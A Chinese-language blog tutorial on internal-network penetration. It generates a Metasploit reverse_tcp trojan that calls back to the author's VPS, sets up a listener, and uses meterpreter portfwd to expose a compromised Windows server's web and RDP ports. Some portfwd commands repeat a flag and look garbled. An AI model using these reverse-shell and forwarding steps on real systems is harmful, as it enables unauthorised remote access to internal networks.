---

前言

在内网渗透过程中，实现端口转发是十分重要的一步。如：我们要进行远程连接，但是它只允许内网主机连接；将内网访问的网站转发出来，实现外网可以访问。要解决这些情况我们都可以通过端口转发来解决，我们可以把内网端口转发到出网的端口上，也可以把端口转发到我们的 VPS主机上。下面以Windows2008服务器为目标服务器 ，以Ubantu为VPS主机。这里为了 方便假设我们已经拿下了服务器的控制权限，同时新建了用户可以远程连接。如有错误的地方，欢迎各位大佬在评论区批评指教。

---

一、生成MSF后门程序并上线

1、使用 MSF生成payload，让目标主机上线，这里的MSF我是搭建在VPS上的。还有不知道咋个在云服务器上搭建MSF可以参考此链接：云服务搭建MSF环境

msfvenom  -p windows/meterpreter/reverse_tcp lhost=101.**.17*.172  lport=12341 -f exe > a1.exe

2、在MSF中设置监听

use exploit/multi/handler

set payload  windows/meterpreter/reverse_tcp

set lhost 101.**.17*.172  #VPS的IP

set lport 12341

run

3、在目标服务器端运行木马程序，发现主机上线，同时也知道了公网IP地址为：222.**.14.3

二、使用portfwd实现端口转发

1、端口转发前测试远程连接和数据库连接是否成功

1、远程连接测试：

win+r 输入：mstsc
输入目标主机的公网IP地址：222.***.14*.3
连接失败

2、网站访问测试，返回无法连接

2、进行端口映射

方法1：

portfwd add -l 101.37.173.172 -l 2020 -p 80 -r 192.168.111.19

通过将内网的80端口转发到VPS上的2020端口，我们就可以直接访问VPS的2020端口就可以访问到内网的80端口，这样进一步寻找内网网站漏洞就更加方便

同理我们来转发内网的3389就端口，实现可以远程访问：

portfwd add -l 101.37.173.172 -l 2021 -p 3389 -r 192.168.111.19

方法2： 这里我就不截图进行证明了，直接写上用法： 转发内网80端口：

portfwd add -l 2022 -p 80 -r 192.168.111.19

转发内网3389端口：

portfwd add -l 2023 -p 3389 -r 192.168.111.19

这样也可以实现端口转发，这个时候我们可以使用一下命令来查看当前建立的端口转发情况和清除建立的端口转发

portfwd list  #查看转发表

portfwd flush #清空转发表

总结

端口转发在内网渗透中是非常重要的，还有很多方法可以实现端口转发，后面的方法将会在以后的文章中慢慢更新，里面有错误的地方还请大佬们批评指正，相互进步。